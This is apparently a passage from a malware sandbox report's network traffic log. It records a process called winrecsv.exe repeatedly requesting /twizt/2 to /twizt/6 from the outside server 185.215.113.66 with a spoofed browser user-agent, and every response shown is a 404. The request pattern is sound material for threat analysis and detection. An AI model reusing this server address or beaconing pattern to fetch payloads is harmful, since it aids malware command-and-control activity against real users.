                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:23.761060953 CEST7028OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:23.817989111 CEST7028INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:24.838673115 CEST7035OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:24.898762941 CEST7036INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:25.923537016 CEST7036OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:25.980289936 CEST7037INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                9192.168.2.749799185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:32:29.194683075 CEST7038OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:29.251115084 CEST7039INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:30.271567106 CEST7039OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:30.333163977 CEST7040INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:31.339890957 CEST7045OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:31.397250891 CEST7045INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:32.406368971 CEST7046OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:32.463176012 CEST7046INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:33.479639053 CEST7047OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:33.536449909 CEST7047INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
